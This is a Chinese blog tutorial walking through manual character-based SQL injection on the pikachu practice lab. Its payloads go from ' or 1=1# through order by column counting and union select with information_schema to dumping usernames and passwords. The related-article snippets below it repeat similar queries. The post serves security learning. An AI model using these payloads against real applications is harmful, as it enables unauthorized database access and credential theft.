sql注入(获取数据库)

最新推荐文章于 2024-05-30 19:45:52 发布
最新推荐文章于 2024-05-30 19:45:52 发布
阅读量2k 收藏 20
点赞数 11
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rnn0921/article/details/132083847
版权

1.1 漏洞简介

        程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。

        SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。

        它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。

1.2 漏洞影响范围

SQL注入会造成以下严重后果:

  1. 盗取用户数据和隐私,这些数据被打包贩卖,或用于非法目的后,轻则损害企业品牌形象,重则将面临法律法规风险。

  2. 攻击者可对目标数据库进行“增删改查”,一旦攻击者删库,企业整个业务将陷于瘫痪,极难恢复。

  3. 植入网页木马程序,对网页进行篡改,发布一些违法犯罪信息。

  4. 攻击者添加管理员帐号。即便漏洞被修复,如果企业未及时察觉账号被添加,则攻击者可通过管理员帐号,进入网站后台。

1.3 sql注入流程

准备:pikachu漏洞练习平台

通过infermation_schema 拿下数据库

以字符型注入为例

输入kobe(pikachu常用)

得到以上信息

然后构造sql语句

select uid,email from user where name = 'kobe' or 1=1#';

输入kobe' or 1=1#'

 

 得到以上信息

此时,并不知道系统查询了几个属性

使用union联合查询

order by 排序的意思

用order by 来确定union后面有几个属性 

先给第1、2个属性排序

输入:kobe' or 1=1 order by 1#

           kobe' or 1=1 order by 2#

 

 给第三个属性排序

 发现没有第三个属性

所以 确定属性个数是2

再来获取数据库名

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select database(),user()#

输入kobe' or 1=1 union select database(),user()#

 得到数据库名

再来获取数据库中的表名

select uid,email from user where name = kobe' or 1=1 union select table_schema,table_name from information_schema.tables where table_schema='root'#

注:数据库为root

        table_schema数据库,table­_name表名

        from information_schema从数据库中查询

        .tables  数据库下的一张表

        此数据库一开始就是存在的

输入 kobe' or 1=1 union select table_schema,table_name from information_schema.tables where table_schema='root'#

得到root数据库下的所有数据表名称

获取数据表下的信息

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select table_name,column_name from information_schema.columns where table_name='users'#        

 注:已经知道表名   挑一张表table_name    

        column_table 存放的是每张表的名称(table_name)所对应的列名

输入: kobe' or 1=1 union select table_name,column_name from information_schema.columns where table_name='users'#        

 发现表中有用户名信息和密码信息

再来获取用户名和密码

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select username,password from users #

输入:kobe' or 1=1 union select username,password from users #

 获取成功!

宁可123
关注
  • 11
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入(information_schema数据库
qq_43814486的博客
03-31 2920
1.union语句 该语句可以使两个语句联合起来,但是该语句有一个前提,就是union后边跟的字段数必须要和前面对应,也就是说要知道前面的字段个数,然后对应上,这里可以用order by,错误的话会出现类似以下样子,说明没有第四字段。 这时候再试试三: 他就不会有报错,说明有三个字段,所以就可以用 union select 自己想要的东西了,比如user(),database(),versio...
sql注入之access数据库
weixin_46476861的博客
02-18 411
猜解数据库表名 猜解数据库字段名 猜解字段内容 order by与union select联合查询,可以快速地获得字段长度及字段内容 自动化注入工具破解数据库方法 穿山甲工具 havij(胡萝卜标志)工具 ...
sql注入之找库、找表、找字段
m0_74608722的博客
05-30 160
sql注入的目标之一为找到想要注入的库、想要注入的表、想要注入的字段。SQL注入中含有字符逃逸。
SQL注入
m0_60651303的博客
07-13 469
select * from user where id=1 or 1=1 等价于 select * from user。网页发送请求给服务端。post:创建操作,参数不可以在URL里看到,不可以在浏览器输入该地址打开。get:查询操作,参数可以在URL里看到,可以直接在浏览器输入该地址打开。面试:手工注入和sqlmap的区别,手工注入只是某一个注入点。需求1:拿到当前登录数据库的用户名,和当前数据库的名称。
Web安全——SQL注入漏洞_简述web注入漏洞获取数据库中数据的主要流程
2401_84968882的博客
05-13 971
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6274
渗透测试-SQL注入之核心语法获取数据库信息
SQL注入——union获取数据库信息
m0_71714379的博客
02-05 1197
web安全学习笔记
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1219
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL注入 - Part 1
捡破烂日记^ ^
05-20 1360
1.web网站基本架构 2.如何构建可以执行的语句 3.sql注入的完整流程
DB2数据库SQL注入手册1
08-08
3. 数据库权限:可以使用以下SQL语句来获取数据库权限信息: ```sql SELECT grantee FROM syscat.dbauth; ``` 防止SQL注入 为了防止SQL注入攻击,可以采取以下措施: 1. 输入验证:在接收用户输入时,应该对输入...
自动SQL注入数据库接管工具
02-24
sqlmap 是一个开源渗透测试工具,可以自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、最终渗透测试仪的许多利基功能以及广泛的开关,包括数据库指纹、从数据库获取数据、访问...
sql注入数据库修复的两种实例方法
09-10
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库获取、修改或删除敏感数据。修复SQL注入问题至关重要,本文将详细介绍两种实例方法来解决数据库中的SQL注入问题。 1. 第一种...
自动化的SQL注入数据库接管工具使用说明
最新发布
06-26
1. 扫描、发现并利用SQL注入漏洞:SQLmap能够自动化地检测目标URL是否存在SQL注入漏洞,并尝试利用这些漏洞获取数据库服务器的权限。 2. 数据库指纹识别:SQLmap能够识别目标数据库的类型和版本,支持多种数据库管理...
sql注入资料.zip
04-17
数据泄露:攻击者可以通过SQL注入获取数据库中的敏感信息,如用户密码、个人信息、财务数据等。 数据篡改:攻击者可以修改数据库中的数据,破坏数据的完整性和准确性。 系统控制:通过SQL注入,攻击者可能获得对...
利用 SQL 注入提取数据方法总结
Flag少侠的博客
04-13 1665
SQL 注入攻击中,UNION 运算符的潜在价值非常明显:如果应用程序返回了第一个(原始)查询得到的所有数据,那么通过在第一个查询后面注入一个 UNION 运算符,并添加另外一个任意查询,便可以读取到数据库用户访问过的任何一张表。
SQL注入--第二关详细讲解
MAY的博客
04-18 1017
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1459
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
pikachu如何利用字符型SQL注入拿下数据库
m0_61903602的博客
10-30 877
pikachu如何利用字符型SQL注入拿下数据库
SQL注入获取数据库用户表数据
qq_59099375的博客
03-18 1291
SQL注入获取数据库数据
Sql注入获取数据库名称,连接数据库的用户名的语句
05-31
以下是一个简单的 SQL 注入语句,可以获取数据库名称和连接数据库的用户名: ``` SELECT DATABASE(), USER() ``` 该语句将返回当前连接的数据库名称和连接数据库的用户名。请注意,这只是一个简单的示例,实际情况可能更加复杂,具体取决于目标网站的数据库结构和安全性措施。在实际攻击中,请务必遵守法律法规和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值